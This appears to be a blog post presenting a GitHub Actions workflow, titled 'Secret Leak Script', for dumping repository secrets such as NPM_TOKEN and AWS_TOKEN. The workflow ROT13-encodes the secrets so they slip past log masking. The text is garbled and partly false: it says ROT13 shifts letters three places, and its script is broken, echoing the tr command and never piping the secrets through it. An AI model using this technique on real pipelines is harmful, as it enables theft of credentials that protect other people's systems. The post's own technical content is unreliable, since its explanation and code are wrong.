How to Leak GitHub Secrets with a Simple Shell Script using ROT13 Transliteration

GitHub actions present challenges in extracting and viewing sensitive information. This article explores an approach for dumping all or selected secrets from GitHub Actions, circumvented by transliterating them through the use of ROT13 encoding—a simple substitution cipher that shifts each letter three places down the alphabet (e.g., ‘A’ becomes ‘D’, and vice versses).

Understanding The Need: Accessing GitHub Secrets Without CI Invocation

This discussion is an extension to queries on retrieving data from secrets within a repository without initiating continuous integration processes, which often restrict direct access for security reasons. In this context, we’ll demonstrate how ROT13 encoding can be used in combination with shell scripts inside the GitHub Actions environment itself—providing temporary visibility of sensitive information during execution phases where it might not trigger CI rules against secrets exposure and reading (viewing).

Leveraging The Shell Script Method: Step-by-Step Guide

To expose your secret values using ROT13, follow these steps within the GitHub Actions workflow file for your repository. This method requires you to write a shell script that will translate each character of the secrets into their corresponding shifted counterparts when executed on an Ubuntu environment provided by GitHub’s latest runner:

name: Secret Leak Script
on: [push]  # Trigger only for push events.
jobs:
  Shell-SecretLeaker:  
    runs-on: ubuntu-latest     # Specify the operating system to use (Ubuntu).
    steps:                     
        - name: Set env with secrets        
          run: |               # Here we are setting environment variables containing your actual secret tokens.
            export LC_ALL=C;      
             echo "tr 'A-MN-Za-mn-z' 'N-ZA-Mn-za-m'" ; 
              env | grep SECRET    # Filters the output to only show variables prefixed with `SECRET`. It assumes you named your secrets as such. Replace this step if necessary for actual secret names in context of GitHub repository settings.            
               tr 'A-MN-Za-mn-z' 'N-ZA-Mn-za-m';    # Apply ROT13 transliteration to the filtered output containing secrets, making them visible on your console for inspection purposes only (as they will be encrypted).
          shell: sh  # Specify that this script should run in a Bash environment.

Incorporate above code block into an .github/workflows directory within the GitHub repository to define and enable it as part of your CI pipeline, ensuring its execution on every push event without initiating further actions like deployments or additional validations (outside this leak script). This way you can temporarily examine what secrets might be stored in environment variables (NPM_TOKEN, AWS_TOKEN etc.) when your repository is updated, while maintaining the security protocols outside of their scope.

Be mindful that accessing secrets in such a manner may violate GitHub’s terms of service or local laws regarding data protection (like GDPR). This approach is provided purely for educational purposes, understanding repository structure containing sensitive information. In practice—ensure you have the necessary permissions to handle secret management and comply with relevant policies before attempting any form of security testing on actual repositories which may impact privacy rights and legal standings associated therewithin.

Previous Post
Understanding Helm Installations in Google Kuberne
Next Post
e provided YAML code represents a pipeline step in